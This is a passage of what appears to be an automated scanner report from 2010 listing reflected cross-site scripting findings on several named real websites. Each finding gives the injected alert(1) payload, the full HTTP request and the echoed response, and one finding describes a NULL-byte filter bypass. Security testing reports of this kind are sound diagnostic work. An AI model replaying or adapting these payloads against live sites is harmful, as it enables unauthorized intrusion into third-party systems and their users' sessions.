InsightExpress.CurrentInvite = {};
InsightExpress.CurrentInvite.Settings = {};
InsightExpress.CurrentInvite.Settings.BannerID = '161857518fc';alert(1)//339d45147ba';
InsightExpress.CurrentInvite.Settings.CampaignID = '1946';


</script>
...[SNIP]...

3.15. http://core.insightexpressai.com/adserver/invites/Reconcile.aspx [campaignID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /adserver/invites/Reconcile.aspx

Issue detail

The value of the campaignID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c15af'%3balert(1)//39926be4976 was submitted in the campaignID parameter. This input was echoed as c15af';alert(1)//39926be4976 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adserver/invites/Reconcile.aspx?bannerID=161857&campaignID=1946c15af'%3balert(1)//39926be4976 HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://www.darkreading.com/blog/archives/evil-bytes/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=9bba28d1288937145; IXAIFirstHit2316=11%2f5%2f2010+1%3a28%3a13+AM; IXAIBanners2316=172110,172110; IXAIBannerCounter172110=2; IXAILastHit2316=11%2f7%2f2010+12%3a13%3a36+AM; IXAICampaignCounter2316=2; IXAIBannerCounter170677=1; IXAIFirstHit2248=11%2f11%2f2010+6%3a45%3a17+PM; IXAIBanners2251=170722; IXAIBannerCounter170722=1; IXAIFirstHit2251=11%2f16%2f2010+3%3a23%3a43+PM; IXAILastHit2251=11%2f16%2f2010+3%3a23%3a43+PM; IXAICampaignCounter2251=1; IXAIFirstHit2211=11%2f16%2f2010+6%3a40%3a19+PM; IXAIBannerCounter169909=7; IXAIBanners2310=172498; IXAIBannerCounter172498=1; IXAIFirstHit2310=11%2f21%2f2010+6%3a20%3a21+PM; IXAILastHit2310=11%2f21%2f2010+6%3a20%3a21+PM; IXAICampaignCounter2310=1; IXAIBanners2211=169909,169909,169909,169909,169909,169909,169909,170103; IXAIBannerCounter170103=1; IXAILastHit2211=11%2f26%2f2010+3%3a00%3a00+PM; IXAICampaignCounter2211=8; IXAIBanners2044=166228; IXAIBannerCounter166228=1; IXAIFirstHit2044=11%2f26%2f2010+3%3a38%3a49+PM; IXAILastHit2044=11%2f26%2f2010+3%3a38%3a49+PM; IXAICampaignCounter2044=1; IXAIBannerCounter173394=1; IXAIFirstHit2357=12%2f1%2f2010+11%3a03%3a32+AM; IXAIBanners2357=173394,173401; IXAIBannerCounter173401=1; IXAILastHit2357=12%2f1%2f2010+10%3a53%3a57+AM; IXAICampaignCounter2357=2; lastInvite=12%2f1%2f2010+11%3a09%3a31+AM; IXAIinvited2357=true; IXAICampaignCounter2203=0; IXAIControlCounter2203=0; IXAIBannerCounter170478=0; IXAIBanners2203=170478,170478,170478; IXAIBanners2248=170677,170676; IXAIBannerCounter170676=1; IXAILastHit2248=12%2f11%2f2010+10%3a35%3a24+AM; IXAICampaignCounter2248=2; IXAICampaignCounter2018=0; IXAIControlCounter2018=0; IXAIBannerCounter169712=0; IXAIBanners2018=169712; IXAIBanners2284=171378; IXAIBannerCounter171378=1; IXAIFirstHit2284=12%2f11%2f2010+10%3a33%3a03+AM; IXAILastHit2284=12%2f11%2f2010+10%3a33%3a03+AM; IXAICampaignCounter2284=1; IXAIBannerCounter161858=1; IXAIFirstHit1946=12%2f11%2f2010+9%3a28%3a02+PM; IXAIBanners1946=161858,161857,161857; IXAIBannerCounter161857=2; IXAILastHit1946=12%2f11%2f2010+10%3a02%3a02+PM; IXAICampaignCounter1946=3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Date: Sun, 12 Dec 2010 03:10:47 GMT
Connection: close
Cache-Control: no-store
Content-Length: 17631


<script>

var ReconcilePage = true;
var InsightExpress={};InsightExpress.LogText='';InsightExpress.Log=function(s,s2){if(!InsightExpress.LogText)InsightExpress.LogText='';InsightExpress.LogText
...[SNIP]...
';
InsightExpress.CurrentInvite = {};
InsightExpress.CurrentInvite.Settings = {};
InsightExpress.CurrentInvite.Settings.BannerID = '161857';
InsightExpress.CurrentInvite.Settings.CampaignID = '1946c15af';alert(1)//39926be4976';


</script>
...[SNIP]...

3.16. http://digg.com/submit [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00e76d9"><script>alert(1)</script>bc6103d984a was submitted in the REST URL parameter 1. This input was echoed as e76d9"><script>alert(1)</script>bc6103d984a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /submit%00e76d9"><script>alert(1)</script>bc6103d984a HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 03:23:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1938518164606297025%3A141; expires=Tue, 11-Jan-2011 03:23:30 GMT; path=/; domain=digg.com
Set-Cookie: d=638eb150eaa5b7bfe53eec9a0f89e5d4262588d1d6c1e108b7e3fee1f9eaed32; expires=Fri, 11-Dec-2020 13:31:10 GMT; path=/; domain=.digg.com
X-Digg-Time: D=186582 10.2.128.108
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15297

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg - error_ - Profile</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics,
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%00e76d9"><script>alert(1)</script>bc6103d984a.rss">
...[SNIP]...

3.17. http://dockets.justia.com/search [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dockets.justia.com
Path:   /search

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f1aa"><script>alert(1)</script>85f3fa554f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search5f1aa"><script>alert(1)</script>85f3fa554f5 HTTP/1.1
Host: dockets.justia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 03:25:34 GMT
Server: Apache/2.0.63 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 123915

<!DOCTYPE HTML>
<html lang="en">
<head>
   <title>Cases filed :: Justia Dockets &amp; Filings</title>
       
   <link rel="stylesheet" href="http://static.justia.com/css/dockets.css" type="text/css" id="style
...[SNIP]...
<meta property="og:url" content="http://dockets.justia.com/search5f1aa"><script>alert(1)</script>85f3fa554f5" />
...[SNIP]...

3.18. http://dockets.justia.com/search [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dockets.justia.com
Path:   /search

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 689dd"><script>alert(1)</script>56f7f634075 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search?689dd"><script>alert(1)</script>56f7f634075=1 HTTP/1.1
Host: dockets.justia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 03:24:12 GMT
Server: Apache/2.0.63 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 123939

<!DOCTYPE HTML>
<html lang="en">
<head>
   <title>Cases filed :: Justia Dockets &amp; Filings</title>
       
   <link rel="stylesheet" href="http://static.justia.com/css/dockets.css" type="text/css" id="style
...[SNIP]...
<meta property="og:url" content="http://dockets.justia.com/search?689dd"><script>alert(1)</script>56f7f634075=1" />
...[SNIP]...

3.19. http://image.providesupport.com/js/valera/safe-standard.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://image.providesupport.com
Path:   /js/valera/safe-standard.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7db41<script>alert(1)</script>9ae9535c64a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js7db41<script>alert(1)</script>9ae9535c64a/valera/safe-standard.js HTTP/1.1
Host: image.providesupport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: vsid=HFU500OBaLl2;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Date: Sun, 12 Dec 2010 03:23:39 GMT
Content-Length: 538

<html>
<body>
<h2>Error 404: Not Found</h2>
<pre>
File: /js7db41<script>alert(1)</script>9ae9535c64a/valera/safe-standard.js
</pre>
<!-- ===================================================== -->
...[SNIP]...

3.20. http://image.providesupport.com/js/valera/safe-standard.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://image.providesupport.com
Path:   /js/valera/safe-standard.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b84de<a>8e297a28546 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /js/valerab84de<a>8e297a28546/safe-standard.js HTTP/1.1
Host: image.providesupport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: vsid=HFU500OBaLl2;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Date: Sun, 12 Dec 2010 03:23:40 GMT
Content-Length: 580

<html>
<body>
<h2>Error 404: Not Found</h2>
<pre>
Page: /js/valerab84de<a>8e297a28546/safe-standard.js
</pre>
<!-- ===================================================== -->
<!-- ===============
...[SNIP]...

3.21. http://redcated/DWA/jview/197028858/direct/01/122917943 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://redcated
Path:   /DWA/jview/197028858/direct/01/122917943

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3ddb'%3bf03f0de2310 was submitted in the REST URL parameter 4. This input was echoed as c3ddb';f03f0de2310 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /DWA/jview/197028858/directc3ddb'%3bf03f0de2310/01/122917943 HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: MUID=34AD5BBBF6FC477CAC5139C76AA247F9; ID=optout;

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6038
Content-Type: text/javascript
Expires: 0
X-Powered-By: ASP.NET
Date: Sun, 12 Dec 2010 03:25:26 GMT
Connection: close

document.write("<meta HTTP-EQUIV='expires' CONTENT='0'></meta>");
document.write("<meta HTTP-EQUIV='Pragma' CONTENT='no-cache'></meta>");

   
var nRequiredVersion = 8;
var bIsRightVersion = fal
...[SNIP]...
<param name="movie" value="HTTP://spe.atdmt.com/ds/DDDWAASPEASP/ESET_US_IT_April09/eset_it_728x90.swf?ver=1&clickTag1=!~!click!~!http://clk.redcated/go/197028858/directc3ddb';f03f0de2310;ai.142745208;ct.1/01&clickTag=!~!click!~!http://clk.redcated/go/197028858/directc3ddb';f03f0de2310;ai.142745208;ct.1/01" />
...[SNIP]...

3.22. http://redcated/DWA/jview/197028859/direct/01/122918379 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://redcated
Path:   /DWA/jview/197028859/direct/01/122918379

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1603a'%3bfb5300b799 was submitted in the REST URL parameter 4. This input was echoed as 1603a';fb5300b799 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /DWA/jview/197028859/direct1603a'%3bfb5300b799/01/122918379 HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: MUID=34AD5BBBF6FC477CAC5139C76AA247F9; ID=optout;

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6036
Content-Type: text/javascript
Expires: 0
X-Powered-By: ASP.NET
Date: Sun, 12 Dec 2010 03:25:30 GMT
Connection: close

document.write("<meta HTTP-EQUIV='expires' CONTENT='0'></meta>");
document.write("<meta HTTP-EQUIV='Pragma' CONTENT='no-cache'></meta>");

   
var nRequiredVersion = 8;
var bIsRightVersion = fal
...[SNIP]...
<param name="movie" value="HTTP://spe.atdmt.com/ds/DDDWAASPEASP/ESET_US_IT_April09/eset_it_300x250.swf?ver=1&clickTag1=!~!click!~!http://clk.redcated/go/197028859/direct1603a';fb5300b799;ai.142763248;ct.1/01&clickTag=!~!click!~!http://clk.redcated/go/197028859/direct1603a';fb5300b799;ai.142763248;ct.1/01" />
...[SNIP]...

3.23. http://www.addthis.com/forum/viewtopic.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /forum/viewtopic.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b3f4f<script>alert(1)</script>2094ea946c1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /forumb3f4f<script>alert(1)</script>2094ea946c1/viewtopic.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sun, 12 Dec 2010 03:25:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=kdnh063rmditf40idg1bvm7vd3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1487
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>forumb3f4f<script>alert(1)</script>2094ea946c1/viewtopic.php</strong>
...[SNIP]...

3.24. http://www.addthis.com/forum/viewtopic.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /forum/viewtopic.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34c1c"-alert(1)-"8384dc80eba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /forum34c1c"-alert(1)-"8384dc80eba/viewtopic.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sun, 12 Dec 2010 03:25:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=pj4ri5onkrsqicl4t37nlk8ep2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1461
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/forum34c1c"-alert(1)-"8384dc80eba/viewtopic.php";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTrack
...[SNIP]...

3.25. http://www.addthis.com/forum/viewtopic.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /forum/viewtopic.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 69425"-alert(1)-"f4118c4a163 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /forum/69425"-alert(1)-"f4118c4a163 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 03:25:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Content-Length: 1435
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/forum/69425"-alert(1)-"f4118c4a163";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

3.26. http://www.addthis.com/forum/viewtopic.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /forum/viewtopic.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 92498<script>alert(1)</script>981b891a7ed was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /forum/92498<script>alert(1)</script>981b891a7ed HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 03:25:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Content-Length: 1461
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>forum/92498<script>alert(1)</script>981b891a7ed</strong>
...[SNIP]...

3.27. http://www.addthis.com/forum/viewtopic.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /forum/viewtopic.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33b3c"-alert(1)-"bb6ab5ffd36 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /forum/viewtopic.php/33b3c"-alert(1)-"bb6ab5ffd36 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 03:25:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=031e31385g4mhfngkv61quejo7; path=/
Expires: 0
Cache-Control: private, no-cache="set-cookie"
Pragma: no-cache
Set-Cookie: phpbb3_bkwcz_u=1; expires=Mon, 12-Dec-2011 03:25:35 GMT; path=/; domain=.addthis.com; HttpOnly
Set-Cookie: phpbb3_bkwcz_k=; expires=Mon, 12-Dec-2011 03:25:35 GMT; path=/; domain=.addthis.com; HttpOnly
Set-Cookie: phpbb3_bkwcz_sid=0fa7b5452218fdee5b56d73ec97b4069; expires=Mon, 12-Dec-2011 03:25:35 GMT; path=/; domain=.addthis.com; HttpOnly
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 12461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-gb" xml:lang="en-gb">
<head>
...[SNIP]...
<script type="text/javascript">
var u = "/forum/viewtopic.php/33b3c"-alert(1)-"bb6ab5ffd36";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

3.28. http://www.darkreading.com/blog/archives/evil_bytes/index.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.darkreading.com
Path:   /blog/archives/evil_bytes/index.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c5834'%3b22cffbe773f was submitted in the REST URL parameter 3. This input was echoed as c5834';22cffbe773f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blog/archives/evil_bytesc5834'%3b22cffbe773f/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292121547041; PHPSESSID=8efl2fv5lkgca0bau3me2u8bb0; s_nr=1292111961290; s_lv_s=Less%20than%201%20day; iwa_user_login_check=OGVmbDJmdjVsa2djYTBiYXUzbWUydThiYjA%3D;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 03:28:14 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=OGVmbDJmdjVsa2djYTBiYXUzbWUydThiYjA%3D; expires=Sat, 11-Dec-2010 17:28:14 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 77522

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<html>
<head>
<title></title>
...[SNIP]...
<scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1183308/0/16/ADTECH;alias=DarkReading_Blogs_WelcomeAd_1x1;key=/blog/archives/evil_bytesc5834';22cffbe773f/index;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=1292124494;misc='+new Date().getTime()+'">
...[SNIP]...

3.29. http://www.darkreading.com/blog/archives/evil_bytes/index.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.darkreading.com
Path:   /blog/archives/evil_bytes/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d73cc"><script>alert(1)</script>c9b224127d8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /blog/archives/evil_bytesd73cc"><script>alert(1)</script>c9b224127d8/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292121547041; PHPSESSID=8efl2fv5lkgca0bau3me2u8bb0; s_nr=1292111961290; s_lv_s=Less%20than%201%20day; iwa_user_login_check=OGVmbDJmdjVsa2djYTBiYXUzbWUydThiYjA%3D;

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 03:28:13 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=OGVmbDJmdjVsa2djYTBiYXUzbWUydThiYjA%3D; expires=Sat, 11-Dec-2010 17:28:13 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 32322


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<html>
<head>
<meta http-equ
...[SNIP]...
ng.com%2Fblog%2Farchives%2Fevil_bytesd73cc%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ec9b224127d8%2Findex.html&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/archives/evil_bytesd73cc"><script>alert(1)</script>c9b224127d8/index.html">
...[SNIP]...

3.30. http://www.darkreading.com/btgcommunity/forum.jspa [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.darkreading.com
Path:   /btgcommunity/forum.jspa

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96de6"><script>alert(1)</script>f434820df34 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

